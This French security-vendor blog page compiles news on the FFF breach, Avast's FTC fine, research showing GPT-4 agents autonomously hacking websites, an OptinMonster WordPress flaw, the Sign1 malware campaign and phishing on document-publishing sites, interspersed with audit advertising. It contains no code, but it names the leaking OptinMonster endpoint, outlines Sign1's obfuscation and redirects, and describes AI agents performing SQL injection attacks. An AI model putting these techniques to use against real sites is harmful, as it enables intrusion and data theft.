La FFF frappée par une cyberattaque Des données personnelles incluant des coordonnées et des numéros de licenciés de la Fédération Française de Football ont été piratées. Plusieurs millions de personnes pourraient être concernées. Suite à la violation de données et la cyberattaque de la FFF, une enquête préliminaire diligentée sur les instructions de la section J3 du Parquet de Paris a été ouverte. (crédit : FFF) Les licenciés de la Fédération Française de Football pour les saisons 2022-2023 et 2023-2024 doivent se montrer particulièrement vigilant dans les jours, semaines et mois qui viennent. L'organisme a été la cible d'une cyberattaque ayant abouti à une violation de données personnelles potentiellement de très grande ampleur. Des données d'identité (nom, prénom, genre, date et lieu de naissance, nationalité) ainsi que des adresses postales, adresses email, numéros de téléphone et de licencié ont en effet été piratés. En revanche les données bancaires n'auraient pas été exposées. "Les conséquences potentielles de cette affaire concernent les différentes formes d’hameçonnage (phishing), de tentatives d’escroqueries ou d’usurpation d’identité dont pourraient être victime les personnes concernées par cet incident", aprévenu Cybermalveillance.gouv.fr. Selon Le Parisien, un hacker agissant sur un forum du Darknet a prétendu détenir et vouloir vendre des informations issues de plusieurs millions de licences. Même les grandes institutions se font avoir, alors avant de vous faire hackers votre site internet faite vous faire un Audit de sécurité gratuit par defender.action-web.com La FFF frappée par une cyberattaque, CNIL et Police Judiciaire sur le coup Suite à cette intrusion dont la FFF a eu connaissance via son prestataire en sécurité, une plainte a été déposée et une enquête préliminaire diligentée sur les instructions de la section J3 du Parquet de Paris a été ouverte à la brigade de lutte contre la cybercriminalité (BL2C) de la direction de la Police Judiciaire de la préfecture de Police de Paris. Les motifs : infractions d’atteintes à des systèmes de traitement automatisé de données, collecte frauduleuse de données à caractère personnel et recel de bien provenant d’un délit. La CNIL a également été prévenue. Audit de sécurité de votre site Internet avec des conseils. 50 % à la commande, 50 % à la livraison après une communication téléphonique et des explications. En quoi consiste cette prestation d’analyses et de conseils de sécurité de site Internet? En un rapport complet sur les défaillances possibles de sécurité de votre site Internet. Suivant l’importance de votre site Internet le rapport d’Audit de Sécurité fera environ une quinzaine de page avec des explications accessibles pour tous. Comment ? Par de multiples analyses et vérifications Des tests d’attaques Des contrôles de structures Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet. en quoi consiste un audit de site web ? Audit de la Configuration de Sécurité  Analyse de la structuration des dossiers web  Analyse de la sécurité du code source  Analyse contre les Attaques DDoS  Analyse de la Sécurité des Données  Analyse des Injections SQL et XSS  Analyse de la Confidentialité des Données  Analyse des Certificats SSL/TLS  Analyse de la Conformité aux Normes de Sécurité  Analyse des Risques Juridiques  Analyse de l'éligibilité sur les moteurs de recherche  Plan d’Action en Cas d’Incident  Conseils des Accès et des Identités  Conseils personnalisés Commander et payer 50 % en ligne Audit réalisé sous 3 à 5 jours ouvrés Pour d'info ? Audit de la Configuration de Sécurité : une évaluation systématique des paramètres de sécurité d’un système informatique, d’un réseau ou d’une application pour s’assurer qu’ils sont correctement configurés et alignés sur les meilleures pratiques de sécurité. Analyse de la structuration des dossiers web : l’analyse

de la structuration des dossiers web consiste à examiner la manière dont les fichiers et les répertoires sont organisés au sein d’une application web ou d’un site internet. Cette analyse vise à évaluer la clarté, la sécurité, la performance et la maintenabilité de la structure des dossiers.  Analyse contre les Attaques DDoS : l‘analyse contre les attaques DDoS (Distributed Denial of Service) vise à évaluer la résilience d’un système, d’un réseau ou d’une application face à ce type d’attaques, qui cherchent à submerger les ressources disponibles pour les rendre inaccessibles aux utilisateurs légitimes. Analyse de la Sécurité des Données : l’analyse de la sécurité des données est un processus qui vise à évaluer la robustesse des mécanismes mis en place pour protéger les données contre les menaces potentielles. Cela inclut l’examen des politiques, des procédures, des technologies et des pratiques liées à la sécurité des données.  Analyse des Injections SQL et XSS : l’ analyse des injections SQL (Structured Query Language) et des attaques XSS (Cross-Site Scripting) sont des aspects cruciaux de la sécurité des applications web. Ces types d’attaques visent à exploiter des vulnérabilités dans les applications pour manipuler des requêtes SQL ou injecter des scripts malveillants dans les pages web.  Analyse de la Confidentialité des Données : l’analyse de la confidentialité des données est une évaluation approfondie des politiques, des procédures et des mécanismes mis en place pour garantir que les données sensibles sont traitées, stockées et transmises de manière sécurisée. Cette analyse vise à identifier les risques potentiels pour la confidentialité des données et à mettre en place des mesures pour les atténuer.  Analyse des Certificats SSL/TLS : l’analyse des certificats SSL/TLS est une étape essentielle pour évaluer la sécurité des connexions cryptées dans un environnement informatique. Les certificats SSL/TLS sont utilisés pour sécuriser les communications sur Internet, assurant l’intégrité, la confidentialité et l’authenticité des données échangées entre un navigateur web et un serveur.  Analyse de la Conformité aux Normes de Sécurité : l’analyse de la conformité aux normes de sécurité consiste à évaluer dans quelle mesure un système, un réseau ou une application respecte les exigences définies par des normes de sécurité spécifiques. Ces normes peuvent être dictées par des réglementations gouvernementales, des organismes de normalisation ou des meilleures pratiques de l’industrie.  Analyse des Risques Juridiques : L’analyse des risques juridiques consiste à évaluer les menaces et les vulnérabilités liées aux aspects juridiques d’une organisation, notamment en ce qui concerne la conformité aux lois, règlements et obligations légales.  Analyse de l’éligibilité sur les moteurs de recherche : l’analyse de l’éligibilité sur les moteurs de recherche, également connue sous le nom d’optimisation pour les moteurs de recherche (SEO), est une évaluation approfondie visant à améliorer la visibilité d’un site web sur les résultats des moteurs de recherche.  Plan d’Action en Cas d’Incident : un document détaillé qui énonce les procédures à suivre en cas d’incident de sécurité ou de tout autre événement perturbateur. L’objectif principal est de minimiser les impacts, de restaurer rapidement les opérations normales et de protéger les actifs de l’organisation.  Conseils des Accès et des Identités : la gestion des accès et des identités (IAM – Identity and Access Management) est cruciale pour assurer la sécurité des systèmes et les fonctionnalités disponible.

Lourde amende pour Avast Avast écope d’une lourde amende, l’antivirus a vendu vos données de navigation. 16,5 millions de dollars Avast a collecté et vendu les données de navigation de ses utilisateurs pendant des années. Mal anonymisées, ces informations ont mis en danger la vie privée des internautes. Condamnée par un régulateur américain, la société doit verser une amende de plusieurs millions de dollars. Avast, l’entreprise de cybersécurité tchèque derrière l’antivirus du même nom, vient d’être épinglé par la Federal Trade Commission (FTC), l’agence gouvernementale américaine chargée de la défense des consommateurs. D’après la FTC, Avast a recueilli des informations concernant les pages web visitées par ses utilisateurs. La collecte de données s’est étendue de 2014 à 2020, indique l’organisme. Lire aussi Des chercheurs ont découvert que le modèle d’IA GPT-4 d’OpenAI est capable de pirater des sites web et de voler des informations dans des bases de données en ligne sans aide humaine Gemini : Google sauvegarde par défaut vos conversations avec son chatbot IA séparément pendant des années Pour mémoire, Avast a en effet mis un terme à Jumpshot, sa filiale consacrée aux données, il y a quatre ans. La firme a pris cette décision à la suite d’une enquête menée par deux médias spécialisés, Vice et PC Mag. L’investigation avait révélé que l’extension navigateur d’Avast s’emparait d’une montagne de données sur les usagers. C’est également le cas de l’antivirus que ce soit sur smartphone ou PC. Des dizaines de millions de dollars de revenus ont été générés grâce à Jumpshot avant sa fermeture. Des données sensibles collectées à votre insu Comme l’indique le communiqué de l’agence, Avast a « injustement recueilli les informations de navigation des consommateurs par le biais des extensions de navigateur et du logiciel antivirus de la société, les a stockées indéfiniment et les a vendues sans préavis et sans le consentement des consommateurs ». Parmi les informations collectées par ce biais, on trouve les « croyances religieuses des consommateurs, les problèmes de santé, les penchants politiques, l’emplacement, la situation financière et les visites de contenus destinés aux enfants ». À l’insu de ses usagers, la société tchèque a vendu les données personnelles, qu’on peut considérer comme sensibles, à plus de 100 tiers. Pire, il s’avère qu’Avast n’a pas pris les mesures adéquates pour anonymiser les données collectées et revendues à des entreprises du secteur de la publicité. Les données ont été cédées avec des identifiants uniques pour chaque navigateur. Chaque identifiant était lié à des informations personnelles, comme les sites web visités, « les horodatages précis, le type d’appareil et de navigateur, le nom de la ville, l’État et le pays ». En combinant ces informations, il est théoriquement possible de remonter jusqu’à l’identité d’un internaute. Selon la FTC, Jumpshot permettait même à ses partenaires de « suivre des utilisateurs spécifiques ou même d’associer des utilisateurs spécifiques – et leur historique de navigation – à d’autres informations ». En 2020, Avast avait pourtant assuré que les données étaient scrupuleusement anonymisées par ses soins, suscitant les inquiétudes des experts en sécurité. Chez Defender action web, on ne parle jamais de nos clients, s'est eux qui parle de nous ! Lourde amende pour Avast de 16,5 millions de dollars La FTC a donc décidé d’interdire à Avast de « vendre ou de concéder sous licence toute donnée de navigation » récupérée par ses produits. La société doit absolument effacer toutes les données personnelles collectées par Jumpshot. Dans la foulée, la firme spécialisée dans les antivirus écope d’une amende de 16,5 millions de dollars. La somme sera utilisée pour « fournir réparation aux consommateurs ». La FTC enjoint Avast à obtenir le « consentement express » des usagers avant de vendre leurs données de navigation. Dans un communiqué adressé à The Verge, Avast se dit opposé aux « allégations et à la caractérisation des faits » mise en avant par la FTC.

Néanmoins, la firme basée en République tchèque se dit heureuse de « résoudre ce problème » afin de pouvoir « continuer à servir nos millions de clients dans le monde entier ».

ChatGPT-4 peut pirater des sites web Des chercheurs ont découvert que le modèle ChatGPT-4 d’OpenAI est capable de pirater des sites web et de voler des informations dans des bases de données en ligne sans aide humaine Des chercheurs ont démontré que les grands modèles de langage sont capables de pirater des sites web de manière autonome, en effectuant des tâches complexes sans connaissance préalable de la vulnérabilité. Le modèle GPT-4 d’OpenAI pouvait pirater 73 % des sites web lors de l’étude. Cette étude rappelle la nécessité pour les fournisseurs de LLM de réfléchir soigneusement au déploiement et à la publication des modèles. Les modèles d’IA, qui font l’objet de préoccupations constantes en matière de sécurité concernant les résultats nuisibles et biaisés, présentent un risque qui va au-delà de l’émission de contenu. Lorsqu’ils sont associés à des outils permettant une interaction automatisée avec d’autres systèmes, ils peuvent agir seuls comme des agents malveillants. Lire aussi France Travail victime d’une cyberattaque. 43 millions de personnes sont potentiellement concernées. Des informaticiens affiliés à l’université de l’Illinois Urbana-Champaign (UIUC) l’ont démontré en utilisant plusieurs grands modèles de langage (LLM) pour compromettre des sites web vulnérables sans intervention humaine. Des recherches antérieures suggèrent que les LLM peuvent être utilisés, malgré les contrôles de sécurité, pour aider à la création de logiciels malveillants. Les chercheurs Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan et Daniel Kang sont allés plus loin et ont montré que les agents alimentés par des LLM – des LLM dotés d’outils d’accès aux API, de navigation web automatisée et de planification basée sur le retour d’information – peuvent se promener seuls sur le web et s’introduire dans des applications web boguées sans surveillance. Ils décrivent leurs résultats dans un article intitulé “LLM Agents can Autonomously Hack Websites” (Les agents LLM peuvent pirater des sites web de manière autonome). Les chercheurs résument leurs travaux en expliquant : Des agents LLM autonomes capables de pirater des sites web Les grands modèles de langage (LLM) sont devenus de plus en plus performants, avec des avancées récentes permettant aux LLM d’interagir avec des outils via des appels de fonction, de lire des documents et de s’auto-inviter récursivement. Collectivement, ces éléments permettent aux LLM de fonctionner de manière autonome en tant qu’agents. Par exemple, les agents LLM peuvent contribuer à la découverte scientifique. Ces agents LLM devenant plus performants, des travaux récents ont spéculé sur le potentiel des LLM et des agents LLM à contribuer à l’offensive et à la défense en matière de cybersécurité. Malgré ces spéculations, on sait peu de choses sur les capacités des agents LLM en matière de cybersécurité. Par exemple, des travaux récents ont montré que les LLM peuvent être incités à générer des logiciels malveillants simples, mais n’ont pas exploré les agents autonomes. L’image suivant présente le schéma de l’utilisation d’agents LLM autonomes pour pirater des sites web : Les agents LLM peuvent pirater des sites web de manière autonome, en effectuant des tâches complexes sans connaissance préalable de la vulnérabilité. Par exemple, ces agents peuvent effectuer des attaques complexes de type SQL union, qui impliquent un processus en plusieurs étapes (38 actions) d’extraction d’un schéma de base de données, d’extraction d’informations de la base de données basée sur ce schéma, et d’exécution du piratage final. L’agent le plus performant peut pirater 73,3 % (11 sur 15, réussite à 5) des vulnérabilités testées, ce qui montre les capacités de ces agents. Il est important de noter que l’agent LLM est capable de trouver des vulnérabilités dans des sites Web du monde réel. Pour donner à ces agents LLM la capacité de pirater des sites web de manière autonome, ils leur ont donné la possibilité de lire

des documents, d’appeler des fonctions pour manipuler un navigateur web et récupérer des résultats, et d’accéder au contexte des actions précédentes. Ils ont fourni en outre à l’agent LLM des instructions détaillées sur le système. Ces capacités sont désormais largement disponibles dans les API standard, telles que la nouvelle API OpenAI Assistants. Par conséquent, ces capacités peuvent être mises en œuvre en seulement 85 lignes de code avec des outils standard. Les résultats ont montré que ces capacités permettent au modèle le plus performant au moment de la rédaction (GPT-4) de pirater des sites web de manière autonome. De manière incroyable, GPT-4 peut effectuer ces piratages sans connaissance préalable de la vulnérabilité spécifique. Tous les composants sont nécessaires pour obtenir des performances élevées, le taux de réussite chutant à 13 % lorsque l’on supprime des composants. Taux de réussite du GPT-4 par vulnérabilité, ai hacker ChatGPT-4 peut pirater des sites web Les résultats ont montré également que le piratage des sites web a une forte loi d’échelle, le taux de réussite de GPT-3.5 tombant même à 6,7 % (1 vulnérabilité sur 15). Cette loi d’échelle se poursuit pour les modèles open-source, chaque modèle open-source testé atteignant un taux de réussite de 0 %. L’étude a également analysé le coût du piratage autonome de sites web. Si l’on tient compte des échecs dans le coût total, la tentative de piratage d’un site web coûte environ 9,81 dollars. Bien que coûteux, ce coût est probablement beaucoup moins élevé que l’effort humain (qui peut coûter jusqu’à 80 dollars). Pour protéger un site Internet il vous faut des pros, il faut savoir ce que vous pouvez perdre, faite vous faire un audit de sécurité intelligence artificial hacking Conclusion Cette recherche montre que les agents LLM peuvent pirater des sites web de manière autonome, sans connaître la vulnérabilité à l’avance. L’agent le plus performant peut même trouver de manière autonome des vulnérabilités dans des sites Web du monde réel. Les résultats montrent en outre des lois d’échelle fortes avec la capacité des LLM à pirater des sites web : GPT-4 peut pirater 73 % des sites web construits pour l’étude, contre 7 % pour GPT-3.5 et 0 % pour tous les modèles open-source. Le coût de ces piratages par des agents LLM est probablement beaucoup moins élevé que le coût d’un analyste en cybersécurité. Combinés, ses résultats montrent la nécessité pour les fournisseurs de LLM de réfléchir soigneusement au déploiement et à la publication des modèles. On peut souligner deux résultats importants. Tout d’abord, l’étude constate que tous les modèles open-source existants sont incapables de pirater de manière autonome, mais que les modèles frontières (GPT-4, GPT-3.5) le sont. Deuxièmement, les chercheurs pensent que ces résultats sont les premiers exemples de dommages concrets causés par les modèles frontières. Compte tenu de ces résultats, ils espèrent que les fournisseurs de modèles open source et fermé examineront attentivement les politiques de diffusion des modèles frontières. ai hacking tools

Un million de sites contrôlés à distance La vulnérabilité d’un plugin WordPress a ouvert un million de sites à une prise de contrôle à distance. Cette faille permet à toute personne non identifiée d’accéder aux informations sensibles Les chercheurs en sécurité de Wordfence, une société spécialisée dans l’ingénierie logicielle et la sécurité, ont révélé que des vulnérabilités dans OptinMonster, un plugin de marketing par courriel pour WordPress, ont exposé un million de sites à une prise de contrôle à distance. Les vulnérabilités permettent à un cybercrinel d’accéder à des informations sensibles et d’ajouter du code JavaScript malveillant aux sites WordPress. Des chercheurs ont découvert que le modèle d’IA GPT-4 d’OpenAI est capable de pirater des sites web et de voler des informations dans des bases de données en ligne sans aide humaine Les pirates peuvent lire les conversations privées avec les assistants d’IA même lorsqu’elles sont chiffrées OptinMonster est un plugin conçu pour aider les propriétaires de sites WordPress à générer des campagnes de marketing par courriel. L’équipe Wordfence Threat Intelligence aurait informé les développeurs de ce plugin de la faille le 28 septembre et une version entièrement corrigée d’OptinMonster, la version 2.6.5, a été publiée le 7 octobre. Wordfence a publié le 27 octobre un avis de sécurité détaillant ses conclusions. « Le 28 septembre 2021, l’équipe Wordfence Threat Intelligence a lancé le processus de divulgation responsable pour plusieurs vulnérabilités que nous avons découvertes dans OptinMonster, un plugin WordPress installé sur plus de 1 000 000 de sites. Ces failles permettaient à un cybercriminel non authentifié, c’est-à-dire n’importe quel visiteur du site, d’exporter des informations sensibles et d’ajouter des JavaScript malveillants aux sites WordPress. Les utilisateurs de Wordfence Premium ont reçu le 28 septembre 2021 une règle de pare-feu pour se protéger contre tout exploit ciblant ces vulnérabilités. Les sites utilisant encore la version gratuite de Wordfence recevront la même protection le 28 octobre 2021 », a déclaré Wordfence. OptinMonster est un plugin incroyablement intuitif et facile à utiliser, conçu pour créer des campagnes de vente sur des sites WordPress grâce à l’utilisation de boîtes de dialogue. La grande majorité des fonctionnalités du plugin ainsi que le site de l’application OptinMonster reposent sur l’utilisation de points de terminaison API pour permettre une intégration transparente et un processus de conception simplifié. Malheureusement, la majorité des points de terminaison REST-API n’ont pas été implémentés de manière sécurisée, ce qui permet à des attaquants non authentifiés d’accéder à de nombreux points de terminaison sur des sites utilisant une version vulnérable du plugin. Le plus critique des points de terminaison REST-API était le point de terminaison /wp-json/omapp/v1/support, qui divulguait des données sensibles telles que le chemin complet du site sur le serveur, ainsi que la clé API nécessaire pour effectuer des requêtes sur le site OptinMonster. En accédant à la clé API, un cybercriminel pouvait modifier toute campagne associée au compte OptinMonster connecté à un site et ajouter un JavaScript malveillant qui s’exécuterait chaque fois qu’une campagne serait affichée sur le site exploité. Cela signifie aussi que n’importe quel attaquant non authentifié peut ajouter un JavaScript malveillant à un site exécutant OptinMonster, ce qui peut conduire à la redirection des visiteurs du site vers des domaines malveillants externes et à la prise de contrôle totale des sites dans le cas où un JavaScript est ajouté pour injecter de nouveaux comptes d’utilisateurs administratifs ou écraser le code du plugin avec un webshell pour obtenir un accès backdoor à un site. Heureusement, l’équipe d’OptinMonster a invalidé toutes les clés API pour obliger les propriétaires de sites à générer de nouvelles clés dans le cas où une clé aurait

été précédemment compromise, et a mis en place des restrictions qui empêchent les clés API associées aux sites WordPress d’effectuer des changements de campagne en utilisant l’application OptinMonster, ce qui empêche l’exploitation de cette chaîne de vulnérabilité. Un million de sites contrôlés à distance Nous avons des solutions pour solutionner vos problèmes de piratage. Le CMS WordPress alimente environ 41 % du Web y compris le site de la Maison Blanche WordPress est un système de gestion de contenu (SGC ou content management system (CMS) en anglais) gratuit, libre et open source. Ce logiciel écrit en PHP repose sur une base de données MySQL et est distribué par la fondation WordPress.org. Les fonctionnalités de WordPress lui permettent de créer et gérer différents types de sites Web : site vitrine, site de vente en ligne, site applicatif, blog, portfolio, site institutionnel, site d’enseignement, etc. Le baromètre W3Techs a indiqué en fin d’année dernière que l’utilisation du CMS WordPress continue de croître : le CMS était à cette date utilisé sur 39,5 % des sites web et serait aujourd’hui utilisé par un peu plus de 41 % des sites du Web. Les nouveaux locataires de la Maison blanche ont choisi de rester sur le CMS WordPress pour lancer le site de la Maison Blanche. L’administration précédente est passée de Drupal à WordPress en 2017, et les développeurs web travaillant avec l’administration Biden ont décidé de s’en tenir au même CMS. En 2016, WordPress a été le CMS le plus ciblé par les cyberattaques, selon une étude menée par la société de sécurité Sucuri. En 2018, le CMS a vu le nombre de vulnérabilités qui lui sont liés tripler. Pour WordPress, le risque est encore plus élevé puisque le CMS propulse près de 41 % des sites du Web, un pourcentage de taille qui fait qu’il existe un large nombre de victimes potentielles, un facteur important qui attire les hackers. Il est recommandé aux utilisateurs du plugin OptinMonster de vérifier que le site a été mis à jour avec la dernière version corrigée d’OptinMonster, qui est la 2.6.5.

Piratage de 39 000 sites Web WordPress Le logiciel malveillant Sign1 a piraté 39 000 sites Web WordPress Le site Web d'un client rencontrait des pop-ups aléatoires alors que les journaux de l'analyseur côté serveur révélaient une injection JavaScript liée à Sign1, une campagne de malware qui cible les sites Web et a infecté plus de 2 500 sites Web au cours des deux derniers mois et utilise des techniques difficiles pour échapper à la détection. Les analyses quotidiennes côté serveur sont cruciales pour détecter les changements tels que les nouveaux logiciels malveillants, examiner les journaux des sites Web et identifier les modifications dans les plugins, en particulier ceux permettant l'injection de code personnalisé. Les plugins sont attrayants pour les attaquants car ils permettent d'intégrer du code malveillant et une enquête a révélé un code malveillant intégré dans un plugin CSS et JS personnalisé apparemment inoffensif. Bien que les attaquants abusent couramment de ces plugins, ce code spécifique affiche une méthode unique et intrigante. culprit nestled inside Custom CSS & JS Piratage de 39 000 sites Web WordPress Histoire du logiciel malveillant Sign1 Les chercheurs en sécurité de Sucuri ont découvert une campagne de malware ciblant les sites Web WordPress appelée Sign1, qui injecte des scripts malveillants dans les sites Web à l'aide de widgets ou de plugins HTML personnalisés. Le malware utilise des paramètres codés en base64 et une randomisation temporelle pour générer des URL dynamiques qui changent toutes les 10 minutes et récupérer des scripts malveillants supplémentaires qui peuvent rediriger les visiteurs vers des sites frauduleux ou diffuser des publicités indésirables. Au deuxième semestre 2023, il a également été découvert qu'il s'agissait d'une campagne, et les chercheurs ont remarqué que le logiciel malveillant modifiait ses méthodes de dissimulation pour éviter d'être détecté. Analyse du logiciel malveillant Le code utilise la randomisation basée sur le temps à des fins de vérification et récupère l'heure Unix actuelle (millisecondes depuis le 01/01/1970) à l'aide de Date.now(), qui est ensuite convertie en secondes et alignée sur un intervalle de 10 minutes, garantissant que les horodatages sont cohérent dans cette fenêtre. La valeur est exprimée sous forme de chaîne hexadécimale et une chaîne apparemment aléatoire agit comme un jeton de vérification, alors que les demandes de fichiers JavaScript provenant d'un domaine tiers incluent ce jeton. utilisation de la date. fonctionne maintenant en haut du script Le serveur compare la composante temporelle du jeton avec l'heure actuelle, rejetant probablement les demandes avec des horodatages obsolètes ou invalides, potentiellement pour empêcher un accès non autorisé ou une récupération de données obsolètes. Les attaquants ont injecté un ensemble de chiffres codés en dur obscurcis par le codage XOR, tandis que la clé (40682) était facilement disponible dans l'échantillon, permettant aux chercheurs d'inverser le codage et de découvrir un domaine nouvellement enregistré. De nouvelles valeurs Cette technique est courante pour les attaquants pour masquer le contenu malveillant tout en restant détectable en connaissant la clé. Le code Javascript malveillant modifie dynamiquement les URL dans les navigateurs des visiteurs toutes les 10 minutes, ciblant les visiteurs qui n'ont pas visité le site via un référent majeur (par exemple, Google) et qui n'ont pas vu la fenêtre contextuelle auparavant (vérifiée par un cookie). La redirection se produit Si les conditions sont remplies, le code injecte un autre script pour rediriger les utilisateurs vers des sites frauduleux (souvent des domaines VexTrio) en envoyant l'URL de la page actuelle, le référent et la langue du navigateur (codé en base64) à un système de distribution de trafic (TDS). Téléchargements par jour Les attaquants utilisent les populaires plugins Simple Custom CSS et JS pour y

parvenir, tandis que le malware récupère des scripts supplémentaires à partir de domaines enregistrés peu de temps avant l'attaque, ce qui les rend difficiles à bloquer. Les attaquants ont changé de fournisseur d'hébergement et ont utilisé Cloudflare pour rendre encore plus difficile la compréhension de leur emplacement en contournant les analyses de sécurité classiques, car le code malveillant réside dans la base de données plutôt que dans les fichiers du serveur.

Les pirates informatiques abusent des sites Web de publication de documents (DDP) pour lancer des cyberattaques. Des acteurs malveillants ont été observés hébergeant des documents de phishing sur des sites légitimes de publication de documents numériques (DDP) dans le cadre de tentatives continues de collecte de sessions et d'identification. Étant donné qu’il est peu probable que les sites DDP soient bloqués par des filtres Web, qu’ils jouissent d’une bonne réputation et qu’ils puissent donner aux visiteurs l’impression qu’ils sont dignes de confiance, l’hébergement de leurres de phishing sur ces sites augmente les chances de réussite d’une attaque de phishing. Les « sites de publication de documents numériques » sont des plates-formes en ligne qui permettent aux utilisateurs de télécharger et de partager des fichiers PDF au format flipbook basé sur un navigateur. Les utilisateurs peuvent lire un PDF dans son intégralité en tournant les pages sans télécharger le fichier, et certains sites Web DDP disposent de fonctionnalités permettant une interaction supplémentaire avec le document. Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo et SimpleBooklet sont quelques sites DDP impliqués dans la campagne. Les attaquants exploitent les sites DDP pour le vol continu d'informations d'identification et de jetons de session Récemment, dans le cadre de tentatives continues de collecte d'informations d'identification et de sessions, les acteurs malveillants ont hébergé des documents de phishing sur des sites de publication de documents numériques légitimes comme Publuu et Marq. Dans l'affaire Publuu, des e-mails de phishing ayant pour objet « Nouveau document de [fournisseur tiers] » ont été envoyés à plusieurs personnes de l'entreprise ciblée à l'aide d'un compte de messagerie compromis appartenant à un fournisseur tiers fiable. Le corps de l’e-mail contenait un lien permettant d’ouvrir un flipbook Publuu. « Le document de phishing était un fichier générique largement utilisé, observé lors d'attaques similaires sur d'autres sites DDP. Cependant, alors que le document de phishing était réutilisé, l’adversaire avait modifié la page Publuu avec le nom de l’organisation expéditrice pour donner de l’authenticité au document », ont partagé les chercheurs de Talos avec Cyber Security News. Le document de phishing L'utilisateur a été redirigé vers un CAPTCHA Cloudflare après avoir cliqué sur le lien « AFFICHER LE PDF EN LIGNE ». L'utilisation du CAPTCHA sert probablement deux objectifs : il protège la page de collecte d'informations d'identification de tout accès automatisé et présente un véritable site Web aux utilisateurs qui cliquent sur le lien de phishing. « Après avoir complété le CAPTCHA, la victime est dirigée vers une réplique convaincante d'une page d'authentification Microsoft 365. L'URL de la page contient une longue chaîne alphanumérique, qui peut servir d'identifiant pour le visiteur », ont indiqué les chercheurs. Les pirates informatiques Dans le cas de Marq, chaque page a été configurée avec une URL distincte utilisant le domaine de premier niveau, contrairement à certains clusters d'activités sur d'autres sites DDP. La chaîne de requête URL tkmilric était une autre fonctionnalité partagée par toutes les URL incorporées dans le document de phishing.  hébergeant le document de phishing Ces fonctionnalités indiquent très probablement une campagne qui utilise le même leurre et des domaines personnalisés ou générés par DGA pour collecter des jetons de session pour les composants Microsoft 365. Atténuations Bloquez les sites DDP courants via des dispositifs de sécurité aux frontières, la détection et la réponse des points de terminaison (EDR) comme Cisco Secure Endpoint, le filtrage du contenu Web et/ou les contrôles de sécurité DNS. Configurez les paramètres de sécurité des e-mails pour reconnaître et informer les destinataires des liens contenus dans les e-mails contenant des URL communes aux sites DDP.

Utilisez les renseignements sur les menaces pour détecter rapidement les sites Web récemment créés associés à des dangers reconnus. Soyez attentif à tout changement de comportement dans l’environnement interne de l’entreprise. Incluez des informations sur les sites DDP et d'autres techniques d'attaque de phishing hébergées dans le cloud dans la formation de sensibilisation à la sécurité des utilisateurs. Grâce à la protection contre les logiciels malveillants Perimeter81, vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits Zero Day. Tous sont incroyablement dangereux et peuvent faire des ravages sur votre réseau. Prix d'un Audit de sécurité de site Internet, Exemple de prix de Mises aux Normes de sécurité Web, Prix de d'une réparation suite à des attaques de site Web. Pour votre compréhension,  quand vous allez chez un garagiste pour votre véhicule qui est en panne, vous avez besoin de savoir si c’est possible de faire les réparations ? le prix des réparations ? quand c’est possibles de les effectuer ? Avoir des contrôles techniques permanent ou ponctuel, par des Audit de Sécurité? un entretien régulier combien ça coute ? Nous sommes dans les mêmes besoins sauf que les spécialistes sont plus rares et que leurs niveaux d’études sont beaucoup plus importants. Parfois, il y a peu de chose à réaliser donc les prix sont moindre, d’où une demande de devis. Si vous effectuez les travaux chez nous, nous prendront en considération l’Audit de Sécurité à auteur de 50%  de sa valeur en déduction sur votre facture. Pour d'autres solutions https://letsgo-web.fr/

Comment prévenir contre les attaques de hackers contre les centres hospitaliers en 2024 Les hôpitaux français cible des hackers Russes La cybersécurité des centres hospitaliers est d'une importance vitale, étant donné que les systèmes de santé stockent des informations médicales sensibles et critiques pour la vie des patients. Voici quelques mesures clés pour prévenir les cyberattaques dans les centres hospitaliers : cyberattaque la meilleure défense c'est: Sensibilisation et formation du personnel : Former le personnel aux meilleures pratiques en matière de cybersécurité est essentiel. Cela inclut l'identification des tentatives de phishing, l'utilisation sûre des mots de passe, et la reconnaissance des menaces potentielles. Mises à jour et patchs : S'assurer que tous les systèmes informatiques, logiciels et dispositifs médicaux sont régulièrement mis à jour avec les derniers correctifs de sécurité pour combler les vulnérabilités connues. Segmentation du réseau : Diviser le réseau informatique en segments distincts et restreindre l'accès en fonction des besoins. Cela limite la propagation des attaques en cas de compromission d'un segment. Surveillance et détection des menaces : Mettre en place des systèmes de surveillance des réseaux pour détecter les activités suspectes ou les tentatives d'intrusion. L'utilisation de solutions de détection d'intrusion et de gestion des événements de sécurité (SIEM) peut aider à repérer les comportements anormaux. Cryptage des données : Chiffrer les données sensibles stockées sur les serveurs, les appareils médicaux et les supports de stockage pour empêcher l'accès non autorisé. Gestion des accès : Mettre en œuvre des politiques strictes de gestion des accès pour limiter l'accès aux informations médicales uniquement aux personnes autorisées. Utiliser l'authentification à deux facteurs lorsque cela est possible. Sauvegarde et reprise après sinistre : Effectuer régulièrement des sauvegardes de données et élaborer des plans de reprise après sinistre pour garantir la disponibilité et l'intégrité des données en cas d'attaque ou de catastrophe. Partenariat avec des experts en cybersécurité : Collaborer avec des entreprises spécialisées en cybersécurité pour évaluer régulièrement les risques, conseiller sur les meilleures pratiques et fournir une réponse rapide en cas d'incident de sécurité. hackers contre les centres hospitaliers  en 2024, ça va être terrible En appliquant ces mesures de manière proactive, les centres hospitaliers peuvent renforcer leur posture de cybersécurité et protéger efficacement les données médicales sensibles de leurs patients. Prix d'un Audit de sécurité de site Internet, Exemple de prix de Mises aux Normes de sécurité Web, Prix de d'une réparation suite à des attaques de site Web. Pour votre compréhension,  quand vous allez chez un garagiste pour votre véhicule qui est en panne, vous avez besoin de savoir si c’est possible de faire les réparations ? le prix des réparations ? quand c’est possibles de les effectuer ? Avoir des contrôles techniques permanent ou ponctuel, par des Audit de Sécurité? un entretien régulier combien ça coute ? Nous sommes dans les mêmes besoins sauf que les spécialistes sont plus rares et que leurs niveaux d’études sont beaucoup plus importants. Parfois, il y a peu de chose à réaliser donc les prix sont moindre, d’où une demande de devis. Si vous effectuez les travaux chez nous, nous prendront en considération l’Audit de Sécurité à auteur de 50%  de sa valeur en déduction sur votre facture. Voir pour des développements spécifique

